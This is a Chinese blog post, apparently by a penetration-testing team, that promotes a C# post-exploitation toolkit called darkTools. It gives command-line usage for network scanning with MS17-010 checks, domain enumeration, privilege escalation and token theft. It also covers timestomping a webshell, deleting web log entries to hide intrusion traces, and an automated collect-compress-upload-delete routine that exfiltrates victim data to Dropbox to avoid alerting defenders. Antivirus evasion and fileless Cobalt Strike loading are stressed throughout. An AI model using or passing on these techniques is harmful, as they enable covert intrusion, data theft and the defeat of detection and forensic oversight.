5号黯区 活跃在一线渗透攻击的队伍

内网渗透工具集darkTools

2021-02-10

前言

蛮久之前就规划写了的,奈何培训要录制视频,录制视频又要写课件,还要搞一下广告……都很费时间费精力,所以也是最近才开始慢慢整,项目上需要这样了,之前的项目不需要到。

darkTools

该集合全部采用CSharp编写,都可以被CS内存加载,实现无文件、免杀。

SharpAliveScanner

1
2
3
4
5
6
7
8
9
10
11
12
13
14
C:\Users\Administrator\Desktop>SharpScanner.exe
Parameter Is not enough.
SharpScanner.exe -ip 192.168.1.2
SharpScanner.exe -ip 192.168.1.2 -novul
SharpScanner.exe -ip 192.168.1.2 -novul -Pn
SharpScanner.exe -ip 192.168.1.2 -Pn
SharpScanner.exe -c 192.168.1.0/24 -Pn
SharpScanner.exe -c 192.168.1.0/24 -novul -Pn
SharpScanner.exe -f c:\ipList.txt -novul -Pn
SharpScanner.exe -AllLan
SharpScanner.exe -AllLan -novul -Pn -save c:\11.txt
SharpScanner.exe -lan17216
SharpScanner.exe -lan17216 -save c:\1.txt
execute-assembly c:\users\jack\desktop\SharpScanner.exe -f c:\users\jack\desktop\ips.txt

内网存活机器探测,现阶段只支持ICMP、none两种方式进行探测。
全内网段扫描只要6个小时。

优点:

  1. 高速,最低256个线程,最高960个线程。
  2. 小巧,17k。
  3. 可被cs直接内存加载扫描。
  4. 方便,支持3个内网段及全内网段的扫描。
  5. 支持MS17010漏洞检测(后期加入其他的)。
  6. 免杀。

缺点:

  1. 不可自定义线程(虽然设置很简单,但是现在懒得改)
  2. 稳定性还不够,体现在有个别网段会需要多20秒的扫描时间。

是快速探测内网的利器。

SharpDomainMachineInfo

通过LDAP获取域内机器信息,包括以下信息部分:

1
"cn| name| dNSHostName| IPaddr| operatingsystem| operatingsystemVersion| lastlogon| whenChanged| whenCreated"

小巧、方便,支持cs内存加载;可指定域控。
保存的文件可直接倒入xls至,分隔符是:|

SharpDomainSessions

通过使用2个windows API 函数枚举域内机器正在登陆的用户。

SharpDomainUserInfo

通过LDAP获取域内用户信息,包括以下信息部分:

1
"sAMAccountName| name| description| displayName| distinguishedName| lastLogon| mail| pwdLastSet| sn"

保存的文件可直接倒入xls至,分隔符是:|

SharpExchangeAccessLog

检测Exchange日志,找出访问者信息,如:IP、outloolook版本、浏览器版本。
主要用于outlook规则滥用攻击前的信息收集。

SharpGetSystem

admin提权到System

免杀不是特别好,具体后面再改改。

SharpTimeMover

修改文件创建、上次访问、上次修改时间。

1
2
3
4
5
6
7
C:\Users\Administrator\Documents\0.ProgramsMe\sharpDarkTools\SharpTimeMover\bin\Debug>TimeMover.exe
Uage:
TimeMover.exe -D c:\eval.exe ==>> TimeMover.exe -F c:\eval.exe c:\windows\system32\notepad.exe
TimeMover.exe -F c:\eval.exe c:\boot.ini
TimeMover.exe -TC eval.exe "2000-08-10 15:13:56"
TimeMover.exe -TA eval.exe "2000-08-10 15:13:56"
TimeMover.exe -TW eval.exe "2000-08-10 15:13:56"

一般我都用第一条:TimeMover.exe -D c:\muma.asp,会把muma.asp的全部时间改为c:\windows\system32\notepad.exe的时间。

SharpTokenSteal

Token窃取,可提权,也可降权。System -> User,Admin -> system,跟上面的Getsystem类似。

SharpUploadToDropbox

上传文件到Dropbox,因为这样速度非常快,比起上传到你的VPS肯定快速很多,且这是大企业,一般都受信任的,不容易引起目标警觉。

SharpUploadToDropbox c:\users\public\compress.zip

SharpWebLogCleaner

Web日志清理工具,可指定清理含有特定字符的行,可同时指定多个字符,治理完毕会恢复文件原有时间。
可指定特定文件
可指定特定目录下的特定文件后缀

1
2
WebLogCleaner.exe -F c:\logs\1.log muma.asp[silic.php,1337.aspx]
WebLogCleaner.exe -D c:\logs\ php,txt[log,] muma.asp[silic.php,1337.aspx]

SharpWebTitle

获取Web的Title,主要用于获取内网机器WEB的title,毕竟老是搞代理,也不舒服。

SharpwindowsBasicInfoGather

打的机器多了,老是手工的话,时间赶不过来,直接上工具,运行一次,自动采集各类信息并上传到dropbox。(实战面对卡巴斯基,使用1个小时候后就会被杀,因为行为确实刻意,采集-压缩-上传3个连起来就高位了。但是改改字符,md5对不上就免杀了。)

分3个功能:

  1. -gather 收集信息,如果是win7及以上,存放在c:\users\public\TMPLog1,反之在c:\TMPLog1
  2. -upload c:\temp\1.rar 上传到dropbox
  3. 不带参数就是收集、压缩打包、上传、删除痕迹一条龙。

收集的资料包括:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
全盘文件列表
ip
链接
注册表启动项
服务启动项
目录启动项
进程
系统劫持文件
rdp连接记录
用户信息
systeminfo
防火墙规则
防火墙状态
安装的程序
杀软信息
arp缓存表
路由表
环境变量
IE代理信息
任务计划信息
路由追踪出网信息
用户在线信息
rdp端口信息

To Do

(下载链接在内部星球号)
还有很多,时间真的少,慢慢整吧,日渐消瘦。